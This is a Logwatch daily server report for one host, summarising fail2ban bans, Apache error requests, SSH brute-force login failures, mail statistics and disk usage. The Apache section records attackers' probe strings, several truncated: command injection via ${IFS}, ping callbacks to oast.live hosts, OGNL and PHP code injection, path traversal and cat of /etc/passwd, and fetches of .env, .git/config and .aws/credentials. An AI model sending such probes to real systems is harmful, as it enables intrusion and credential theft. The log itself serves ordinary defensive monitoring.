################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sat Aug 5 04:42:03 2023 Date Range Processed: yesterday ( 2023-Aug-04 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [194:199] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 157.245.149.180 -> google.com:443: 1 Time(s) 157.245.150.241 -> google.com:443: 1 Time(s) 199.254.199.10 -> create.roblox.com:443: 1 Time(s) 54.221.140.120 -> zapf.wiki:443: 1 Time(s) 84.54.51.12 -> google.com:443: 2 Time(s) A total of 14 sites probed the server 103.153.77.123 107.170.247.47 109.237.98.226 135.148.13.183 167.99.199.214 192.241.231.7 193.35.18.253 202.184.205.107 205.210.31.41 46.101.221.153 5.188.210.227 64.62.197.125 66.240.205.34 89.248.165.96 Requests with error response codes 400 Bad Request null: 14 Time(s) /: 7 Time(s) google.com:443: 4 Time(s) /aaa9: 3 Time(s) /aab8: 3 Time(s) *: 2 Time(s) /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 2 Time(s) A@BAE@FAI: 2 Time(s) mstshash=Administr: 2 Time(s) /.env: 1 Time(s) /private/api/v1/service/premaster: 1 Time(s) 7: 1 Time(s) D\xDDjm\xE6\x010iml\x09\xF1I\x91\xA24N\x13 ... x00\x01\x02\x00: 1 Time(s) HTTP/1.0: 1 Time(s) \x04\x9F\xFA\x8B\xEAY;c\x81z\x91\xFE\x90o\ ... xE3\xB5\xD5\xEE: 1 Time(s) \x07\xC2Y\x8B\x17F\xD3\x0E\x9Ab\xD0;: 1 Time(s) \x0C\xFBw&,-\xC3kA\xDC\xF9\x1CoM\x04c\xEE\ ... x16\xC3\x00\x00: 1 Time(s) \x13z\xFA\xB7\xF6\xCB\x85\x9B\x02\xEF\xAF\ ... x09\xC0\x14\xC0: 1 Time(s) \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x ... x09\xC0\x14\xC0: 1 Time(s) \xC8\x0B\xAEML\xE2\xD3\x22\x0B\xCC\xE8\xAD\xBEu\xCFi: 1 Time(s) \xFA: 1 Time(s) create.roblox.com:443: 1 Time(s) zapf.wiki:443: 1 Time(s) 500 Internal Server Error /: 32 Time(s) /.env: 6 Time(s) /favicon.ico: 5 Time(s) /.git/config: 3 Time(s) /_profiler/phpinfo: 2 Time(s) /robots.txt: 2 Time(s) /%24%7B%28%23_memberAccess%5B%22allowStati ... onChain1.action: 1 Time(s) /.aws/credentials: 1 Time(s) /.gitlab-ci.yml: 1 Time(s) /2TVw3HOlCFKCCAqqwFBNR3ABY3o.php: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /?action=command&command=set_city_timezone ... o34.oast.live)): 1 Time(s) /CMSPages/Staging/SyncServer.asmx/ProcessS ... izationTaskData: 1 Time(s) /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /actuator/env: 1 Time(s) /actuator/gateway/routes: 1 Time(s) /admin/index.php?module=file_editor&file=/ ... ./../etc/passwd: 1 Time(s) /api/userrolelist/systemRoles?require-cfg.js: 1 Time(s) /api/v1/repos/search?limit=1: 1 Time(s) /autodiscover/autodiscover.json?@zdi/Powershell: 1 Time(s) /backend/backend/auth/signin: 1 Time(s) /cf_scripts/scripts/ajax/ckeditor/ckeditor.js: 1 Time(s) /cgi-bin-hax/ExportSettings.sh: 1 Time(s) /cgi-bin/rpc: 1 Time(s) /cgi?2: 1 Time(s) /cgi?7: 1 Time(s) /console/login/LoginForm.jsp: 1 Time(s) /dns-query: 1 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s) /geoserver/web/: 1 Time(s) /hybridity/api/sessions: 1 Time(s) /include/exportUser.php?type=3&cla=applica ... swd)%3Eqyhu.txt: 1 Time(s) /include/qyhu.txt: 1 Time(s) /index.php?a=fetch&content=%3C%3Fphp+file_ ... %29%3B%22%29%3B: 1 Time(s) /install/lib/ajaxHandlers/ajaxServerSettin ... %73%77%64%20%23: 1 Time(s) /ispirit/interface/gateway.php: 1 Time(s) /j_security_check: 1 Time(s) /login/index.php?login=$(ping${IFS}-nc${IF ... rxdj.oast.live): 1 Time(s) /openam/oauth2/..;/ccversion/Version: 1 Time(s) /owa/auth/x.js: 1 Time(s) /pentaho/api/userrolelist/systemRoles?require-cfg.js: 1 Time(s) /php/ping.php: 1 Time(s) /plus/flink.php?dopost=save&c=cat%20/etc/passwd: 1 Time(s) /poc.jsp/: 1 Time(s) /poc.jsp?cmd=cat+%2Fetc%2Fpasswd: 1 Time(s) /rest/tinymce/1/macro/preview: 1 Time(s) /restore.php: 1 Time(s) /t4: 1 Time(s) /upload/UploadResourcePic.ashx?ResourceID=8382: 1 Time(s) /wp-content/plugins/wp-file-manager/lib/ph ... tor.minimal.php: 1 Time(s) /wp-json/buddypress/v1/signup: 1 Time(s) /ws/v1/cluster/apps/new-application: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: unknown (134.209.30.76): 37 Time(s) unknown (170.64.141.213): 37 Time(s) root (82.180.163.236): 29 Time(s) root (static-84-242-124-74.bb.vodafone.cz): 29 Time(s) root (43.163.207.202): 27 Time(s) root (36.112.135.187): 25 Time(s) root (150.230.235.117): 24 Time(s) root (150.109.149.87): 21 Time(s) root (177.27.216.106): 20 Time(s) root (158.160.38.134): 19 Time(s) root (178.163.240.19): 18 Time(s) root (45.95.147.201): 18 Time(s) root (static-190-181-25-210.acelerate.net): 18 Time(s) root (100.73.199.35.bc.googleusercontent.com): 17 Time(s) root (102.218.10.142): 17 Time(s) root (170.238.160.191): 17 Time(s) root (174.138.24.127): 17 Time(s) root (180.164.240.35.bc.googleusercontent.com): 17 Time(s) root (181.214.223.190): 17 Time(s) root (193.158.129.106): 17 Time(s) root (2-228-25-92.ip189.fastwebnet.it): 17 Time(s) root (200.108.132.134): 17 Time(s) root (200.108.143.6): 17 Time(s) root (43.135.172.127): 17 Time(s) root (43.159.40.48): 17 Time(s) root (68.183.132.72): 17 Time(s) root (114-44-131-199.dynamic-ip.hinet.net): 16 Time(s) root (180.213.3.2): 16 Time(s) root (182.93.50.90): 16 Time(s) root (202.153.37.56): 16 Time(s) root (49.231.241.23): 16 Time(s) unknown (24.199.111.93): 16 Time(s) root (102.14.93.34.bc.googleusercontent.com): 15 Time(s) root (117.232.123.90): 15 Time(s) root (120.238.177.235): 15 Time(s) root (134.209.30.76): 15 Time(s) root (14.143.3.30): 15 Time(s) root (170.64.141.213): 15 Time(s) root (188.166.173.156): 15 Time(s) root (203.172.76.4): 15 Time(s) root (36.156.145.28): 15 Time(s) root (49.248.95.218): 15 Time(s) root (115.166.142.18): 14 Time(s) root (134.17.17.32): 14 Time(s) root (148.63.215.173): 14 Time(s) root (152.70.113.55): 14 Time(s) root (165.232.161.144): 14 Time(s) root (188.121.96.70): 14 Time(s) root (43.131.253.76): 14 Time(s) root (67.205.187.255): 14 Time(s) root (p4fe0648d.dip0.t-ipconnect.de): 14 Time(s) root (134.209.69.41): 13 Time(s) root (165.227.68.95): 13 Time(s) root (24.199.111.93): 13 Time(s) root (43.130.26.49): 13 Time(s) root (128.199.182.19): 12 Time(s) root (144.126.210.70): 12 Time(s) root (157.230.125.144): 12 Time(s) root (157.245.154.129): 12 Time(s) root (162.177.139.34.bc.googleusercontent.com): 12 Time(s) root (167.71.54.30): 12 Time(s) root (178.128.156.114): 12 Time(s) root (181.49.178.6): 12 Time(s) root (185.224.128.142): 12 Time(s) root (185.83.74.97.host.secureserver.net): 12 Time(s) root (186.154.90.114): 12 Time(s) root (187.218.23.85): 12 Time(s) root (187.44.214.58): 12 Time(s) root (189.190.218.32): 12 Time(s) root (190.145.12.233): 12 Time(s) root (192.210.226.176): 12 Time(s) root (209.97.183.120): 12 Time(s) root (43.153.192.102): 12 Time(s) root (43.153.212.177): 12 Time(s) root (43.154.129.174): 12 Time(s) root (43.156.98.81): 12 Time(s) root (46.101.2.4): 12 Time(s) root (hsi-icb-surrey.com): 12 Time(s) unknown (24.199.112.118): 12 Time(s) root (43.159.37.80): 11 Time(s) unknown (134.17.94.181): 11 Time(s) unknown (49.248.16.146): 11 Time(s) root (36-2-237-170.kanagawa.ap.gmo-isp.jp): 10 Time(s) root (185.255.91.41): 9 Time(s) unknown (111.53.87.28): 9 Time(s) unknown (189.182.242.184): 9 Time(s) unknown (134.122.65.9): 8 Time(s) unknown (59-127-158-223.hinet-ip.hinet.net): 8 Time(s) unknown (vps-09dd1441.vps.ovh.net): 8 Time(s) root (103.143.248.52): 7 Time(s) root (103.164.221.210): 7 Time(s) root (154.221.27.121): 7 Time(s) unknown (103.143.248.52): 7 Time(s) unknown (117.141.17.196): 7 Time(s) unknown (141.94.106.15): 7 Time(s) unknown (167.71.238.89): 7 Time(s) unknown (45.80.64.230): 7 Time(s) unknown (mx.portalofertowy24.pl): 7 Time(s) root (101.36.151.78): 6 Time(s) root (117.141.17.196): 6 Time(s) root (121.158.70.160): 6 Time(s) root (121.89.208.200): 6 Time(s) root (167.71.238.89): 6 Time(s) root (186.67.77.26): 6 Time(s) root (20.106.206.86): 6 Time(s) root (65.151.177.127): 6 Time(s) unknown (20.106.206.86): 6 Time(s) unknown (45.95.147.201): 6 Time(s) root (134.17.94.181): 5 Time(s) root (141.94.106.15): 5 Time(s) root (23.95.197.209): 5 Time(s) root (59-127-158-223.hinet-ip.hinet.net): 5 Time(s) root (82-65-173-65.subs.proxad.net): 5 Time(s) root (mx.portalofertowy24.pl): 5 Time(s) unknown (185.255.91.41): 5 Time(s) unknown (82-65-173-65.subs.proxad.net): 5 Time(s) root (193.169.255.233): 4 Time(s) unknown (175.211.139.213): 4 Time(s) root (111.53.87.28): 3 Time(s) root (134.122.65.9): 3 Time(s) root (189.182.242.184): 3 Time(s) root (36.110.228.254): 3 Time(s) root (45.80.64.230): 3 Time(s) root (49.248.16.146): 3 Time(s) unknown (14.34.18.121): 3 Time(s) unknown (143.244.129.88): 3 Time(s) unknown (81.17.22.114): 3 Time(s) unknown (93.95.225.144): 3 Time(s) postgres (mx.portalofertowy24.pl): 2 Time(s) root (194.55.224.48): 2 Time(s) root (221.7.227.90): 2 Time(s) root (24.199.112.118): 2 Time(s) root (vps-09dd1441.vps.ovh.net): 2 Time(s) unknown (254.96.166.178.rev.vodafone.pt): 2 Time(s) unknown (88.248.22.194): 2 Time(s) unknown (c-76-28-20-79.hsd1.ct.comcast.net): 2 Time(s) postgres (134.209.30.76): 1 Time(s) postgres (170.64.141.213): 1 Time(s) postgres (24.199.111.93): 1 Time(s) postgres (vps-09dd1441.vps.ovh.net): 1 Time(s) root (143.244.129.88): 1 Time(s) root (162.214.112.164): 1 Time(s) root (43.134.250.4): 1 Time(s) root (43.154.134.119): 1 Time(s) root (93.95.225.144): 1 Time(s) root (vmi1343886.contaboserver.net): 1 Time(s) unknown (114-44-131-199.dynamic-ip.hinet.net): 1 Time(s) unknown (14.143.3.30): 1 Time(s) unknown (194.55.224.48): 1 Time(s) unknown (43.159.37.80): 1 Time(s) unknown (79.110.48.86): 1 Time(s) Invalid Users: Unknown Account: 269 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 19.917K Bytes accepted 20,395 19.917K Bytes sent via SMTP 20,395 ======== ================================================== 2 Accepted 100.00% -------- -------------------------------------------------- 2 Total 100.00% ======== ================================================== 5 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 5 Total 4xx Rejects 100.00% ======== ================================================== 313 Connections 73 Connections lost (inbound) 313 Disconnections 2 Removed from queue 2 Sent via SMTP 1 Timeouts (inbound) 1 SMTP dialog errors 3 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 2 Time(s) Failed logins from: 2.228.25.92 (2-228-25-92.ip189.fastwebnet.it): 17 times 14.143.3.30 (blrfoiwe.in): 15 times 20.106.206.86: 6 times 23.95.197.209 (23-95-197-209-host.colocrossing.com): 5 times 24.199.111.93: 14 times 24.199.112.118: 2 times 34.93.14.102 (102.14.93.34.bc.googleusercontent.com): 15 times 34.139.177.162 (162.177.139.34.bc.googleusercontent.com): 12 times 35.199.73.100 (100.73.199.35.bc.googleusercontent.com): 17 times 35.240.164.180 (180.164.240.35.bc.googleusercontent.com): 17 times 36.2.237.170 (36-2-237-170.kanagawa.ap.gmo-isp.jp): 10 times 36.110.228.254: 3 times 36.112.135.187: 25 times 36.156.145.28: 15 times 43.130.26.49: 13 times 43.131.253.76: 14 times 43.134.250.4: 1 time 43.135.172.127: 17 times 43.153.192.102: 12 times 43.153.212.177: 12 times 43.154.129.174: 12 times 43.154.134.119: 1 time 43.156.98.81: 12 times 43.159.37.80: 11 times 43.159.40.48: 17 times 43.163.207.202: 27 times 45.80.64.230: 3 times 45.95.146.103 (mx.portalofertowy24.pl): 7 times 45.95.147.201 (burgeons.harbormaker.com): 18 times 46.101.2.4: 12 times 49.231.241.23: 16 times 49.248.16.146 (static-146.16.248.49-tataidc.co.in): 3 times 49.248.95.218 (static-218.95.248.49-tataidc.co.in): 15 times 51.75.200.113 (vps-09dd1441.vps.ovh.net): 3 times 59.127.158.223 (59-127-158-223.hinet-ip.hinet.net): 5 times 65.151.177.127: 6 times 67.205.187.255: 14 times 68.183.132.72: 17 times 79.224.100.141 (p4fe0648d.dip0.t-ipconnect.de): 14 times 82.65.173.65 (82-65-173-65.subs.proxad.net): 5 times 82.180.163.236: 29 times 84.242.124.74 (static-84-242-124-74.bb.vodafone.cz): 29 times 93.95.225.144 (vps-93-95-225-144.1984.is): 1 time 97.74.83.185 (185.83.74.97.host.secureserver.net): 12 times 101.36.151.78: 6 times 102.218.10.142: 17 times 103.143.248.52: 7 times 103.164.221.210 (210.221.164.103.net.iforte.net.id): 7 times 111.53.87.28: 3 times 114.44.131.199 (114-44-131-199.dynamic-ip.hinet.net): 16 times 115.166.142.18 (142-166-115-khetanisp.net): 14 times 117.141.17.196: 6 times 117.232.123.90 (rishabh.co.in): 15 times 120.238.177.235: 15 times 121.89.208.200: 6 times 121.158.70.160: 6 times 128.199.182.19: 12 times 134.17.17.32 (32-17-17-134-cloud.mts.by): 14 times 134.17.94.181 (181-94-17-134-cloud.mts.by): 5 times 134.122.65.9: 3 times 134.209.30.76: 16 times 134.209.69.41: 13 times 141.94.106.15: 5 times 143.244.129.88: 1 time 144.91.127.21 (vmi1343886.contaboserver.net): 1 time 144.126.210.70: 12 times 148.63.215.173 (173.215.63.148.rev.vodafone.pt): 14 times 150.109.149.87: 21 times 150.230.235.117: 24 times 152.70.113.55: 14 times 154.221.27.121: 7 times 157.230.125.144: 12 times 157.245.154.129: 12 times 158.160.38.134: 19 times 159.65.55.28 (hsi-icb-surrey.com): 12 times 162.214.112.164 (162-214-112-164.unifiedlayer.com): 1 time 165.227.68.95 (erp.ihcksa-1638619754136-s-1vcpu-2gb-nyc3-01): 13 times 165.232.161.144: 14 times 167.71.54.30: 12 times 167.71.238.89: 6 times 170.64.141.213: 16 times 170.238.160.191: 17 times 174.138.24.127: 17 times 177.27.216.106 (ip-177-27-216-106.user.vivozap.com.br): 20 times 178.128.156.114: 12 times 178.163.240.19: 18 times 180.213.3.2: 16 times 181.49.178.6: 12 times 181.214.223.190: 17 times 182.93.50.90 (n18293z50l90.static.ctmip.net): 16 times 185.224.128.142: 12 times 185.255.91.41 (static.41.91.255.185.clients.irandns.com): 9 times 186.67.77.26: 6 times 186.154.90.114 (britishcouncil.org.co): 12 times 187.44.214.58 (187-44-214-58.STATIC.itsweb.com.br): 12 times 187.218.23.85 (customer-187-218-23-85.uninet-ide.com.mx): 12 times 188.121.96.70: 14 times 188.166.173.156: 15 times 189.182.242.184 (dsl-189-182-242-184-dyn.prod-infinitum.com.mx): 3 times 189.190.218.32 (dsl-189-190-218-32-dyn.prod-infinitum.com.mx): 12 times 190.145.12.233: 12 times 190.181.25.210 (static-190-181-25-210.acelerate.net): 18 times 192.210.226.176 (192-210-226-176-host.colocrossing.com): 12 times 193.158.129.106: 17 times 193.169.255.233: 4 times 194.55.224.48: 2 times 200.108.132.134: 17 times 200.108.143.6: 17 times 202.153.37.56: 16 times 203.172.76.4 (reverse-203-172-76-4.csloxinfo.net): 15 times 209.97.183.120: 12 times 221.7.227.90: 2 times Illegal users from: 2001:470:1:c84::18: 1 time undef: 136 times 14.34.18.121: 3 times 14.143.3.30 (blrfoiwe.in): 1 time 20.106.206.86: 6 times 24.199.111.93: 16 times 24.199.112.118: 12 times 43.159.37.80: 1 time 45.80.64.230: 7 times 45.95.146.103 (mx.portalofertowy24.pl): 7 times 45.95.147.201 (burgeons.harbormaker.com): 6 times 45.129.14.51 (sanchez.explorethebest.com): 1 time 49.248.16.146 (static-146.16.248.49-tataidc.co.in): 11 times 51.75.200.113 (vps-09dd1441.vps.ovh.net): 8 times 59.127.158.223 (59-127-158-223.hinet-ip.hinet.net): 8 times 64.62.197.120 (scan-47n.shadowserver.org): 1 time 76.28.20.79 (c-76-28-20-79.hsd1.ct.comcast.net): 2 times 79.110.48.86: 1 time 81.17.22.114 (hostedby.privatelayer.com): 15 times 82.65.173.65 (82-65-173-65.subs.proxad.net): 5 times 88.248.22.194 (88.248.22.194.static.ttnet.com.tr): 2 times 93.95.225.144 (vps-93-95-225-144.1984.is): 3 times 103.143.248.52: 7 times 111.53.87.28: 9 times 114.44.131.199 (114-44-131-199.dynamic-ip.hinet.net): 1 time 117.141.17.196: 7 times 134.17.94.181 (181-94-17-134-cloud.mts.by): 11 times 134.122.65.9: 8 times 134.209.30.76: 37 times 141.94.106.15: 7 times 143.244.129.88: 3 times 167.71.238.89: 7 times 170.64.141.213: 37 times 175.211.139.213: 5 times 178.166.96.254 (254.96.166.178.rev.vodafone.pt): 2 times 185.255.91.41 (static.41.91.255.185.clients.irandns.com): 5 times 189.182.242.184 (dsl-189-182-242-184-dyn.prod-infinitum.com.mx): 9 times 194.55.224.48: 1 time **Unmatched Entries** userauth_pubkey: unsupported public key algorithm: rsa-sha2-512 [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop47383p1 394G 243G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################